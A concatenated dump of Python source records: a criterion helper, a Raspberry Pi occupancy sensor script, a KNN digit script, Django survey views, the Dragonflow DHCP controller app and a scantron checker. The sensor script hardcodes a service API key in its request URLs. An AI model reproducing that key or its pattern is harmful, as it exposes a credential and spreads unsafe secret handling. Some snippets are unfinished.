dtypes,\n init_value=None,\n max_value=None,\n min_value=None\n ):\n \"\"\"\n Create criterion JSON format from input values\n\n @retuns criterion JSON structure\n \"\"\"\n\n crit = {\"label\": label,\n \"universe\": universe,\n \"mem_funcs\": mem_funcs,\n \"rating\": list(rating.keys()),\n \"type\": crit_type,\n \"dtypes\": dtypes,\n \"rules\": {\n \"standalone_impact\": standalone_impact,\n \"disable_processing\": disable_processing\n },\n \"frontend\": {\n \"type\": input_type,\n \"section\": section,\n \"help\": help_txt,\n \"rating\": rating\n }}\n if input_type not in [\"list\", \"text\"]:\n assert init_value is not None, \"Initial value for frontend must be given for number/range inputs.\"\n assert max_value is not None, \"Max value for frontend must be given for number/range inputs.\"\n assert min_value is not None, f\"Min value for frontend must be given for number/range inputs. 
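The two CSV-backed mutations above come down to one pandas idiom each: create_exclusion_criteria() appends a criterion as a row with df.loc[name] = ratings, while add_method() appends a method as a column with df[label] = ratings. A toy illustration with invented method and criterion names, standing in for the rating_bool CSV:

import pandas as pd

df = pd.DataFrame({'LIME': [1, 0], 'SHAP': [1, 1]},
                  index=['needs_model_access', 'supports_images'])
df.loc['runs_offline'] = [1, 1]   # new exclusion criterion (row)
df['Anchors'] = [1, 0, 1]         # new XAI method (column)
print(df)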
({min_value})\"\n\n crit[\"frontend\"][\"initialValue\"] = init_value\n crit[\"frontend\"][\"max\"] = max_value\n crit[\"frontend\"][\"min\"] = min_value\n crit[\"frontend\"][\"range_min\"] = list(rating.values())[0]\n crit[\"frontend\"][\"range_max\"] = list(rating.values())[-1]\n\n return crit\n","repo_name":"viadee/xair","sub_path":"xai_xps/src/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":9849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10502866692","text":"import RPi.GPIO as GPIO\nimport time\nimport threading\nimport datetime\nfrom gpiozero import MotionSensor\nimport requests\nimport json\n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(16, GPIO.OUT)\nipir = MotionSensor(4)\n\nGPIO.setup(27,GPIO.OUT)\nGPIO.setup(22,GPIO.IN)\nGPIO.setup(23,GPIO.OUT)\nGPIO.setup(24,GPIO.IN)\n\nhumans = 0\ncount = [0, 0]\nmo = False #lamp status\n\ndef sendtoserver():\n\tj = requests.get(\"http://thingtalk.ir/channels/118/feed.json?key=CSL9Y4UV0XPJSOB7\")\n\tpast = j.json()\n\ts = \"http://thingtalk.ir/update?key=CSL9Y4UV0XPJSOB7\"\n\ts += \"&field1=\"\n\ts += str(humans)\n\ts += \"&field2=\"\n\ts += str(int(mo))\n\tif(past[\"feeds\"] != []):\n\t\tx = past[\"feeds\"][len(past[\"feeds\"])-1] \n\t\tfor i in range(3,5):\n\t\t\ts += \"&field\"+str(i)+\"=\"+x[\"field\"+str(i)]\n\telse:\n\t\ts += \"&field3=0&field4=0\"\n\trequests.get(s)\n\n\t\t\t\t\t\t\n\ndef ultra( threadName, TRIG_04, ECHO_04\t):\n\t\n\tglobal humans\n\tglobal count\n\tprint (\"humans: \", humans)\n\ti = 0\n\tdefa = 0;\n\tstart = False\n\tpre = 0\n\twhile True:\n\n\t\tGPIO.output(TRIG_04, False)\n\t\ttime.sleep(0.2)\n\n\t\tGPIO.output(TRIG_04, True)\n\n\t\ttime.sleep(0.00001)\n \n\t\tGPIO.output(TRIG_04, False)\n \n\t\twhile GPIO.input(ECHO_04)==0:\n\t\t\tpulse_start = time.time()\n\n\t\twhile GPIO.input(ECHO_04)==1:\n\t\t\tpulse_end = time.time()\n\t\n\t\tpulse_duration = pulse_end - pulse_start\n\n\n\t\tdistance_04 = pulse_duration * 17150\n\t\tdistance_04 = round(distance_04, 2)\n\n\t\t#detecting human\n\t\tif((pre - distance_04) > 20):\n\t\t\tif(start):\n\t\t\t\tif((defa-distance_04) > 20):\n\t\t\t\t\tcount[int(threadName)] += 1\n\t\t\t\t\tif(count[0] == count[1]):\n\t\t\t\t\t\tif(threadName == \"0\"):\n\t\t\t\t\t\t\thumans -= 1\n\t\t\t\t\t\t\tif(humans < 0):\n\t\t\t\t\t\t\t\thumans = 0\n\t\t\t\t\t\t\t\tcount = [0,0]\n\t\t\t\t\t\t\tprint(\"-1\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\thumans += 1\n\t\t\t\t\t\t\tprint(\"+1\")\n\t\t\t\t\t\tsendtoserver()\n\n\t\tpre = distance_04\n\n\t\t#understand default distance\n\t\tif(i < 10):\n\t\t\tdefa += distance_04\n\t\telif(i == 10):\n\t\t\tstart = True\n\t\t\tdefa /= 10\n\t\t\tpre = defa\n\t\ti += 1\ntry:\n\tthreading.Thread(target=ultra, args=(\"0\", 23, 24, )).start()\n\tthreading.Thread(target=ultra, args=(\"1\", 27, 22, )).start()\nexcept:\n\tprint (\"Error: unable to start thread\")\t\t\n\ni = 0\ntry:\n\twhile True:\n\n\t\tif ((ipir.motion_detected) or (humans>0)):\n\t\t\ti = 0\n\t\t\tif(mo == False):\n\t\t\t\tmo = True\n\t\t\t\tsendtoserver()\n\t\t\tGPIO.output(16, True)\n\t\t\tif(humans <= 0):\n\t\t\t\tprint(datetime.datetime.now().time(), \"Motion detected!\")\n\t\tif((i == 17)):\n\t\t\ti = 0\n\t\t\tif(humans == 0):\n\t\t\t\tGPIO.output(16, False)\n\t\t\t\tif(mo):\n\t\t\t\t\tmo = False\n\t\t\t\t\tsendtoserver()\n\t\ti += 1\n\t\tprint(count)\n\t\ttime.sleep(0.3)\n\nexcept 
KeyboardInterrupt:\n\tprint(\"Errr\",humans,\"\\n\\n\\n\\n\\n\\n\")\n\tGPIO.cleanup()\n\n","repo_name":"SamanFekri/SmartSchool","sub_path":"Hardware/2ultrasonicwithpir.py","file_name":"2ultrasonicwithpir.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"21651848906","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# build the training dataset\ndef build_data():\n    dirname=\"five/trainingDigits/\"\n    trains = os.listdir(dirname)\n    # big array holding every sample: label in column 0, flattened 32x32 image after it\n    datalist = np.zeros((len(trains),1025))\n    newlines=np.zeros((32,32))\n    fileindex = 0\n    for train in trains:\n        with open(file=dirname+train,mode='r') as f:\n            lineindex=0\n            realnum = int(train[0:1])\n            lines = f.readlines()\n            for line in lines:\n                intline = np.array([int(i) for i in line[0:32]])\n                newlines[lineindex] = intline\n                lineindex+=1\n            datalist[fileindex,0:1] = realnum\n            datalist[fileindex,1:] = newlines.ravel()\n            fileindex+=1\n    save_data(datalist)\n    print()\n    \n\ndef save_data(datalist):\n    np.save('five/data/train.npy', datalist)\n\ndef load_data():\n    train_data = np.load('five/data/train.npy')\n    print(train_data)\ndef knndo():\n    knn = KNeighborsClassifier(n_neighbors=5)\n    knn.fit()\n\n# visualize the data\ndef view():\n    # create the canvas\n    plt.figure()\n    # plot\n    \n\nload_data()","repo_name":"Sirlanri/data-analysis","sub_path":"five/机器学习.py","file_name":"机器学习.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16809076877","text":"import random\nfrom django.contrib.auth.decorators import user_passes_test, login_required\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom functions import *\nfrom survey import models\nfrom teacher import models as teacher_view\n\n\ndef generateToken(request):\n    return random.randint(100000, 999999)\n\n\ndef index(request):\n    if request.POST:\n        form = models.Form.objects.get(formName=request.POST['form'])\n        mcqs = models.MCQ.objects.filter(form=form).filter(token__isnull=True)\n        textViews = models.TextView.objects.filter(form=form).filter(token__isnull=True)\n        token = models.Token.objects.get(tokenId=request.session.get('token'))\n        for id, mcq in enumerate(mcqs):\n            # token.mcq = mcq\n            MCQ = models.MCQ()\n            MCQ.token = models.Token.objects.get(tokenId=request.session.get('token'))\n            MCQ.textName = mcq.textName\n            MCQ.form = mcq.form\n            # mcq.token = models.Token.objects.get(tokenId=request.session.get('token'))\n            mcq_options = models.Options.objects.filter(mcq=mcq)\n            # options.token = models.Token.objects.get(tokenId=request.session.get('token'))\n            #print(request.POST[str(id)])\n            o = mcq_options[int(request.POST[str(id)])]\n            o.result += 1\n            o.save()\n            print(str(id) + ':' + str(o.result))\n            MCQ.save()\n        for id, textView in enumerate(textViews):\n            # token.textview = textView\n            TextView = models.TextView()\n            TextView.textName = textView.textName\n            TextView.form = textView.form\n            TextView.token = models.Token.objects.get(tokenId=request.session.get('token'))\n            # textView.token = models.Token.objects.get(tokenId=request.session.get('token'))\n            TextView.result = request.POST[textView.textName]\n            TextView.save()\n        token.form = form\n        token.survey = form.survey\n        token.save()\n        # form.token = models.Token.objects.get(tokenId=request.session.get('token'))\n        # form.save(force_update=True)\n    semesters = teacher_view.Semester.objects.all()\n    primaryKey = []\n    for semester in semesters:\n        primaryKey.append(semester.pk)\n    
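The magic number 17150 in the ultrasonic record above is just the speed of sound: roughly 34300 cm/s at room temperature, halved because the pulse travels to the obstacle and back. A quick check of that arithmetic:

def echo_to_cm(pulse_seconds, speed_cm_per_s=34300):
    return pulse_seconds * speed_cm_per_s / 2   # == pulse_seconds * 17150

print(echo_to_cm(0.01))   # 171.5 cm for a 10 ms round trip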
zipped_data = zip(semesters, primaryKey)\n context = {\n 'zippedData': zipped_data,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/index.html', context)\n\n\ndef allFroms(request, sem):\n forms = models.Form.objects.filter(semester=models.Semester.objects.get(pk=int(sem))).filter()\n primaryKey = []\n for form in forms:\n primaryKey.append(form.pk)\n zipped_data = zip(forms, primaryKey)\n context = {\n 'zippedData': zipped_data,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/form.html', context)\n\n\ndef formFill(request, formId):\n form = models.Form.objects.get(pk=int(formId))\n mcqs = models.MCQ.objects.filter(form=form).filter(token__isnull=True)\n textView = models.TextView.objects.filter(form=form).filter(token__isnull=True)\n options = []\n for mcq in mcqs:\n options.append({'mcq': mcq, 'options': models.Options.objects.filter(mcq=mcq)})\n\n context = {\n 'form': form,\n 'options': options,\n 'textView': textView,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/formfill.html', context)\n","repo_name":"bineeth923/FES","sub_path":"student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18789083574","text":"import collections\nimport copy\nimport functools\nimport math\nimport struct\n\nfrom neutron.conf import common as common_config\nfrom neutron_lib import constants as n_const\nfrom os_ken.lib import addrconv\nfrom os_ken.lib.packet import dhcp\nfrom os_ken.lib.packet import ethernet\nfrom os_ken.lib.packet import ipv4\nfrom os_ken.lib.packet import packet as os_ken_packet\nfrom os_ken.lib.packet import udp\nfrom os_ken.ofproto import ether\nfrom oslo_log import log\n\nfrom dragonflow.common import utils as df_utils\nfrom dragonflow import conf as cfg\nfrom dragonflow.controller.common import arp_responder\nfrom dragonflow.controller.common import constants as const\nfrom dragonflow.controller.common import icmp_responder\nfrom dragonflow.controller import df_base_app\nfrom dragonflow.db.models import constants as model_constants\nfrom dragonflow.db.models import host_route\nfrom dragonflow.db.models import l2\n\nLOG = log.getLogger(__name__)\n\n\nclass DHCPApp(df_base_app.DFlowApp):\n def __init__(self, *args, **kwargs):\n super(DHCPApp, self).__init__(*args, **kwargs)\n self.idle_timeout = 30\n self.hard_timeout = 0\n\n cfg.CONF.register_opts(common_config.core_opts)\n self.conf = cfg.CONF.df_dhcp_app\n\n self.global_dns_list = self.conf.df_dns_servers\n self.lease_time = cfg.CONF.dhcp_lease_duration\n self.domain_name = cfg.CONF.dns_domain\n self.block_hard_timeout = self.conf.df_dhcp_block_time_in_sec\n self.default_interface_mtu = self.conf.df_default_network_device_mtu\n self._port_rate_limiters = collections.defaultdict(\n functools.partial(df_utils.RateLimiter,\n max_rate=self.conf.df_dhcp_max_rate_per_sec,\n time_unit=1))\n self.api.register_table_handler(const.DHCP_TABLE,\n self.packet_in_handler)\n self._dhcp_ip_by_subnet = {}\n\n def _get_dhcp_port_by_network(self, network_unique_key):\n\n lswitch = self.db_store.get_one(l2.LogicalSwitch(\n unique_key=network_unique_key),\n index=l2.LogicalSwitch.get_index('unique_key'))\n\n return self.db_store.get_one(\n l2.LogicalPort(\n device_owner=n_const.DEVICE_OWNER_DHCP,\n lswitch=lswitch\n ),\n index=l2.LogicalPort.get_index('switch,owner')\n )\n\n def switch_features_handler(self, ev):\n 
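The DHCP app above builds _port_rate_limiters as collections.defaultdict(functools.partial(df_utils.RateLimiter, ...)), so each port id lazily gets its own limiter on first lookup, and calling the limiter reports whether that port is over budget. A self-contained sketch of the pattern; SimpleRateLimiter is an illustrative stand-in, since df_utils.RateLimiter's internals are not shown in this dump:

import collections
import functools
import time

class SimpleRateLimiter:
    def __init__(self, max_rate, time_unit=1):
        self.max_rate, self.time_unit = max_rate, time_unit
        self.window_start, self.count = time.monotonic(), 0

    def __call__(self):
        now = time.monotonic()
        if now - self.window_start >= self.time_unit:   # start a new window
            self.window_start, self.count = now, 0
        self.count += 1
        return self.count > self.max_rate               # True -> over the limit

limiters = collections.defaultdict(
    functools.partial(SimpleRateLimiter, max_rate=3, time_unit=1))
print([limiters['port-1']() for _ in range(5)])   # [False, False, False, True, True]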
self._install_dhcp_packet_match_flow()\n self.add_flow_go_to_table(const.DHCP_TABLE,\n const.PRIORITY_DEFAULT,\n const.L2_LOOKUP_TABLE)\n self._port_rate_limiters.clear()\n\n def _check_port_limit(self, lport):\n\n port_rate_limiter = self._port_rate_limiters[lport.id]\n\n return port_rate_limiter()\n\n def packet_in_handler(self, event):\n msg = event.msg\n\n pkt = os_ken_packet.Packet(msg.data)\n pkt_ip = pkt.get_protocol(ipv4.ipv4)\n\n if not pkt_ip:\n LOG.error(\"No support for non IPv4 protocol\")\n return\n\n unique_key = msg.match.get('reg6')\n lport = self.db_store.get_one(\n l2.LogicalPort(unique_key=unique_key),\n index=l2.LogicalPort.get_index('unique_key'),\n )\n\n network_key = msg.match.get('metadata')\n dhcp_lport = self._get_dhcp_port_by_network(network_key)\n if not dhcp_lport:\n LOG.error(\"No DHCP port for network {}\".format(str(network_key)))\n return\n\n if self._check_port_limit(lport):\n self._block_port_dhcp_traffic(unique_key, lport)\n LOG.warning(\"pass rate limit for %(port_id)s blocking DHCP \"\n \"traffic for %(time)s sec\",\n {'port_id': lport.id,\n 'time': self.block_hard_timeout})\n return\n\n if not self.db_store.get_one(lport):\n LOG.error(\"Port %s no longer found.\", lport.id)\n return\n try:\n self._handle_dhcp_request(pkt, lport, dhcp_lport)\n except Exception:\n LOG.exception(\"Unable to handle packet %s\", msg)\n\n def _handle_dhcp_request(self, packet, lport, dhcp_port):\n dhcp_packet = packet.get_protocol(dhcp.dhcp)\n dhcp_message_type = self._get_dhcp_message_type_opt(dhcp_packet)\n send_packet = None\n if dhcp_message_type == dhcp.DHCP_DISCOVER:\n send_packet = self._create_dhcp_response(\n packet,\n dhcp_packet,\n dhcp.DHCP_OFFER,\n lport,\n dhcp_port)\n LOG.info(\"sending DHCP offer for port IP %(port_ip)s \"\n \"port id %(port_id)s\",\n {'port_ip': lport.ip, 'port_id': lport.id})\n elif dhcp_message_type == dhcp.DHCP_REQUEST:\n send_packet = self._create_dhcp_response(\n packet,\n dhcp_packet,\n dhcp.DHCP_ACK,\n lport,\n dhcp_port)\n LOG.info(\"sending DHCP ACK for port IP %(port_ip)s \"\n \"port id %(tunnel_id)s\",\n {'port_ip': lport.ip,\n 'tunnel_id': lport.id})\n else:\n LOG.error(\"DHCP message type %d not handled\",\n dhcp_message_type)\n if send_packet:\n unique_key = lport.unique_key\n self.dispatch_packet(send_packet, unique_key)\n\n def _create_dhcp_response(self, packet, dhcp_request,\n response_type, lport, dhcp_port):\n pkt_ipv4 = packet.get_protocol(ipv4.ipv4)\n pkt_ethernet = packet.get_protocol(ethernet.ethernet)\n\n try:\n subnet = lport.subnets[0]\n except IndexError:\n LOG.warning(\"No subnet found for port %s\", lport.id)\n return\n\n dhcp_server_address = self._dhcp_ip_by_subnet.get(subnet.id)\n if not dhcp_server_address:\n LOG.warning(\"Could not find DHCP server address for subnet %s\",\n subnet.id)\n return\n\n option_list = self._build_dhcp_options(dhcp_request,\n response_type,\n lport,\n subnet,\n dhcp_server_address)\n\n options = dhcp.options(option_list=option_list)\n\n dhcp_response = os_ken_packet.Packet()\n dhcp_response.add_protocol(ethernet.ethernet(\n ethertype=ether.ETH_TYPE_IP,\n dst=pkt_ethernet.src,\n src=dhcp_port.mac))\n dhcp_response.add_protocol(ipv4.ipv4(dst=pkt_ipv4.src,\n src=dhcp_server_address,\n proto=pkt_ipv4.proto))\n dhcp_response.add_protocol(udp.udp(src_port=const.DHCP_SERVER_PORT,\n dst_port=const.DHCP_CLIENT_PORT))\n\n siaddr = lport.dhcp_params.siaddr or dhcp_server_address\n\n dhcp_response.add_protocol(dhcp.dhcp(op=dhcp.DHCP_BOOT_REPLY,\n chaddr=pkt_ethernet.src,\n siaddr=siaddr,\n 
boot_file=dhcp_request.boot_file,\n yiaddr=lport.ip,\n xid=dhcp_request.xid,\n options=options))\n return dhcp_response\n\n def _build_dhcp_options(self, dhcp_request, response_type,\n lport, subnet, srv_addr):\n \"\"\"\n according the RFC the server need to response with\n with all the option that \"explicitly configured options\"\n and supply as many of the \"requested parameters\" as\n possible\n\n https://www.ietf.org/rfc/rfc2131.txt (page 29)\n \"\"\"\n\n # explicitly configured options\n default_opts = self._build_response_default_options(response_type,\n lport, subnet,\n srv_addr)\n\n # requested options (according to dhcp_params.opt)\n response_opts = self._build_response_requested_options(dhcp_request,\n lport,\n default_opts)\n\n response_opts.update(default_opts)\n\n option_list = [dhcp.option(tag, value)\n for tag, value in response_opts.items()]\n\n return option_list\n\n def _build_response_default_options(self, response_type, lport,\n subnet, srv_addr):\n options_dict = {}\n pkt_type_packed = struct.pack('!B', response_type)\n dns = self._get_dns_address_list_bin(subnet)\n host_routes = self._get_host_routes_list_bin(subnet, lport)\n\n server_addr_bin = srv_addr.packed\n netmask_bin = subnet.cidr.netmask.packed\n domain_name_bin = struct.pack('!%ss' % len(self.domain_name),\n self.domain_name.encode())\n lease_time_bin = struct.pack('!I', self.lease_time)\n\n options_dict[dhcp.DHCP_MESSAGE_TYPE_OPT] = pkt_type_packed\n options_dict[dhcp.DHCP_SUBNET_MASK_OPT] = netmask_bin\n options_dict[dhcp.DHCP_IP_ADDR_LEASE_TIME_OPT] = lease_time_bin\n options_dict[dhcp.DHCP_SERVER_IDENTIFIER_OPT] = server_addr_bin\n options_dict[dhcp.DHCP_DNS_SERVER_ADDR_OPT] = dns\n options_dict[dhcp.DHCP_DOMAIN_NAME_OPT] = domain_name_bin\n options_dict[dhcp.DHCP_CLASSLESS_ROUTE_OPT] = host_routes\n\n gw_ip = self._get_port_gateway_address(subnet, lport)\n if gw_ip:\n gw_ip_bin = gw_ip.packed\n options_dict[dhcp.DHCP_GATEWAY_ADDR_OPT] = gw_ip_bin\n\n if response_type == dhcp.DHCP_ACK:\n interface_mtu = self._get_port_mtu(lport)\n mtu_bin = struct.pack('!H', interface_mtu)\n options_dict[dhcp.DHCP_INTERFACE_MTU_OPT] = mtu_bin\n\n return options_dict\n\n def _build_response_requested_options(self, dhcp_request,\n lport, default_opts):\n options_dict = {}\n req_list_opt = dhcp.DHCP_PARAMETER_REQUEST_LIST_OPT\n requested_opts = self._get_dhcp_option_by_tag(dhcp_request,\n req_list_opt)\n if not requested_opts:\n return {}\n\n for opt in requested_opts:\n # For python3 opt is already int.\n if isinstance(opt, str):\n opt_int = ord(opt)\n else:\n opt_int = opt\n\n if opt_int in default_opts:\n # already answered by the default options\n continue\n\n value = lport.dhcp_params.opts.get(opt_int)\n if value:\n value_bin = struct.pack('!%ss' % len(value),\n value.encode())\n options_dict[opt_int] = value_bin\n\n return options_dict\n\n def _get_dns_address_list_bin(self, subnet):\n dns_servers = self.global_dns_list\n if len(subnet.dns_nameservers) > 0:\n dns_servers = subnet.dns_nameservers\n dns_bin = b''\n for address in dns_servers:\n dns_bin += addrconv.ipv4.text_to_bin(address)\n return dns_bin\n\n def _get_host_routes_list_bin(self, subnet, lport):\n host_routes = copy.copy(subnet.host_routes)\n if self.conf.df_add_link_local_route:\n # Add route for metadata request.\n host_routes.append(host_route.HostRoute(\n destination='%s/32' % const.METADATA_SERVICE_IP,\n nexthop=lport.ip))\n\n routes_bin = b''\n opt = lport.dhcp_params.opts.get(dhcp.DHCP_CLASSLESS_ROUTE_OPT)\n if opt:\n dest_cidr, _c, via = 
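For reference, the option values that _build_response_default_options() packs below are plain network byte order: '!I' for the 4-byte lease time, '!H' for the 2-byte interface MTU, '!B' for the single message-type byte. A quick demonstration with illustrative values:

import struct

print(struct.pack('!I', 86400).hex())   # 00015180 -> 24-hour lease
print(struct.pack('!H', 1450).hex())    # 05aa     -> MTU 1450
print(struct.pack('!B', 5).hex())       # 05       -> DHCP ACK message type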
opt.partition(',')\n host_routes.append(\n host_route.HostRoute(destination=dest_cidr,\n nexthop=via))\n\n # We must add the default route here. if a host supports classless\n # route options, it must ignore the router option\n gateway = self._get_port_gateway_address(subnet, lport)\n if gateway is not None:\n host_routes.append(\n host_route.HostRoute(\n destination='0.0.0.0/0',\n nexthop=gateway,\n ),\n )\n\n for route in host_routes:\n dest = route.destination.network\n mask = route.destination.prefixlen\n routes_bin += struct.pack('B', mask)\n \"\"\"\n for compact encoding\n Width of subnet mask Number of significant octets\n 0 0\n 1- 8 1\n 9-16 2\n 17-24 3\n 25-32 4\n \"\"\"\n addr_bin = addrconv.ipv4.text_to_bin(dest)\n dest_len = int(math.ceil(mask / 8.0))\n routes_bin += addr_bin[:dest_len]\n routes_bin += addrconv.ipv4.text_to_bin(route.nexthop)\n\n return routes_bin\n\n def _get_dhcp_option_by_tag(self, dhcp_packet, tag):\n if dhcp_packet.options:\n for opt in dhcp_packet.options.option_list:\n if opt.tag == tag:\n return opt.value\n\n def _get_dhcp_message_type_opt(self, dhcp_packet):\n opt_value = self._get_dhcp_option_by_tag(dhcp_packet,\n dhcp.DHCP_MESSAGE_TYPE_OPT)\n if opt_value:\n return ord(opt_value)\n\n def _get_port_gateway_address(self, subnet, lport):\n gateway_ip = subnet.gateway_ip\n if gateway_ip:\n return gateway_ip\n return lport.dhcp_params.opts.get(dhcp.DHCP_GATEWAY_ADDR_OPT)\n\n def _get_port_mtu(self, lport):\n # get network mtu from lswitch\n lswitch = lport.lswitch\n mtu = lswitch.mtu\n if mtu:\n return mtu\n return self.default_interface_mtu\n\n def _install_dhcp_classification_flow(self):\n parser = self.parser\n\n match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,\n ip_proto=n_const.PROTO_NUM_UDP,\n udp_src=const.DHCP_CLIENT_PORT,\n udp_dst=const.DHCP_SERVER_PORT)\n\n self.add_flow_go_to_table(const.SERVICES_CLASSIFICATION_TABLE,\n const.PRIORITY_MEDIUM,\n const.DHCP_TABLE, match=match)\n\n def _block_port_dhcp_traffic(self, unique_key, lport):\n match = self.parser.OFPMatch(reg6=unique_key)\n drop_inst = None\n self.mod_flow(\n inst=drop_inst,\n priority=const.PRIORITY_VERY_HIGH,\n hard_timeout=self.block_hard_timeout,\n table_id=const.DHCP_TABLE,\n match=match)\n\n def _install_dhcp_packet_match_flow(self):\n parser = self.parser\n\n match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,\n ip_proto=n_const.PROTO_NUM_UDP,\n udp_src=const.DHCP_CLIENT_PORT,\n udp_dst=const.DHCP_SERVER_PORT)\n\n self.add_flow_go_to_table(const.SERVICES_CLASSIFICATION_TABLE,\n const.PRIORITY_MEDIUM,\n const.DHCP_TABLE, match=match)\n\n def _install_dhcp_port_flow(self, lswitch):\n parser = self.parser\n ofproto = self.ofproto\n match = parser.OFPMatch(metadata=lswitch.unique_key)\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n self.mod_flow(\n inst=inst,\n table_id=const.DHCP_TABLE,\n priority=const.PRIORITY_MEDIUM,\n match=match)\n\n def _remove_dhcp_network_flow(self, lswitch):\n parser = self.parser\n ofproto = self.ofproto\n match = parser.OFPMatch(metadata=lswitch.unique_key)\n self.mod_flow(\n table_id=const.DHCP_TABLE,\n command=ofproto.OFPFC_DELETE,\n priority=const.PRIORITY_MEDIUM,\n match=match)\n\n def _add_dhcp_ips_by_subnet(self, lport):\n subnet_ids = (subnet.id for subnet in lport.subnets)\n self._dhcp_ip_by_subnet.update(dict(zip(subnet_ids, lport.ips)))\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_CREATED)\n def 
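A standalone worked example of the "compact encoding" (RFC 3442, option 121) that _get_host_routes_list_bin() implements above: one byte of prefix length, then only ceil(mask/8) significant octets of the destination, then the 4-byte next hop. encode_route() is an illustrative helper, not part of the app:

import math
import socket
import struct

def encode_route(cidr, nexthop):
    dest, mask = cidr.split('/')
    mask = int(mask)
    out = struct.pack('B', mask)                         # prefix length
    out += socket.inet_aton(dest)[:math.ceil(mask / 8)]  # significant octets only
    out += socket.inet_aton(nexthop)                     # 4-byte next hop
    return out

print(encode_route('169.254.169.254/32', '10.0.0.2').hex())  # 20a9fea9fe0a000002
print(encode_route('0.0.0.0/0', '10.0.0.1').hex())           # 000a000001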
_lport_created(self, lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n return\n\n self._install_dhcp_port_responders(lport)\n self._install_dhcp_port_flow(lport.lswitch)\n\n self._add_dhcp_ips_by_subnet(lport)\n\n def _update_port_responders(self, lport, orig_lport):\n self._uninstall_dhcp_port_responders(orig_lport)\n self._install_dhcp_port_responders(lport)\n\n def _update_dhcp_ips_by_subnet(self, lport, orig_lport):\n\n self._add_dhcp_ips_by_subnet(lport)\n\n orig_subnets = set(subnet.id for subnet in orig_lport.subnets)\n new_subnets = set(subnet.id for subnet in lport.subnets)\n\n deleted_subnets = orig_subnets - new_subnets\n for subnet_id in deleted_subnets:\n del self._dhcp_ip_by_subnet[subnet_id]\n\n def _delete_lport_rate_limiter(self, lport):\n if not lport.is_local:\n return\n\n if lport.id in self._port_rate_limiters:\n del self._port_rate_limiters[lport.id]\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_UPDATED)\n def _lport_updated(self, lport, orig_lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n return\n\n v4_ips = set(ip for ip in lport.ips if\n ip.version == n_const.IP_VERSION_4)\n v4_old_ips = set(ip for ip in orig_lport.ips\n if ip.version == n_const.IP_VERSION_4)\n\n if v4_ips != v4_old_ips or lport.mac != orig_lport.mac:\n self._update_port_responders(lport, orig_lport)\n\n self._update_dhcp_ips_by_subnet(lport, orig_lport)\n\n def _delete_dhcp_ips_by_subnet(self, lport):\n for subnet in lport.subnets:\n del self._dhcp_ip_by_subnet[subnet.id]\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_DELETED)\n def _lport_deleted(self, lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n self._delete_lport_rate_limiter(lport)\n return\n\n self._uninstall_dhcp_port_responders(lport)\n self._remove_dhcp_network_flow(lport.lswitch)\n self._delete_dhcp_ips_by_subnet(lport)\n\n def _install_dhcp_port_responders(self, lport):\n ips_v4 = (ip for ip in lport.ips\n if ip.version == n_const.IP_VERSION_4)\n for ip in ips_v4:\n icmp_responder.ICMPResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=lport.ip,\n table_id=const.L2_LOOKUP_TABLE,\n ).add()\n\n arp_responder.ArpResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=ip,\n interface_mac=lport.mac,\n ).add()\n\n def _uninstall_dhcp_port_responders(self, lport):\n ips_v4 = (ip for ip in lport.ips\n if ip.version == n_const.IP_VERSION_4)\n for ip in ips_v4:\n icmp_responder.ICMPResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=lport.ip,\n table_id=const.L2_LOOKUP_TABLE,\n ).remove()\n\n arp_responder.ArpResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=ip,\n interface_mac=lport.mac,\n ).remove()\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/controller/apps/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":20621,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"42523316660","text":"# scantron_checker.py\nimport random\nscantron_choices = ['a', 'b', 'c', 'd', 'e'] \n\ndef make_rand_answers():\n out_answers = []\n for _ in range(0, 5):\n out_answers.append(random.choice(scantron_choices))\n return out_answers\n\nnephews_answers = make_rand_answers()\nanswer_sheet = make_rand_answers()\nprint(nephews_answers, answer_sheet)\n\ncounter = 0\nfor i in range(5):\n if answer_sheet[i] == nephews_answers[i]:\n print(\"Correct\")\n counter += 1 # counter = 
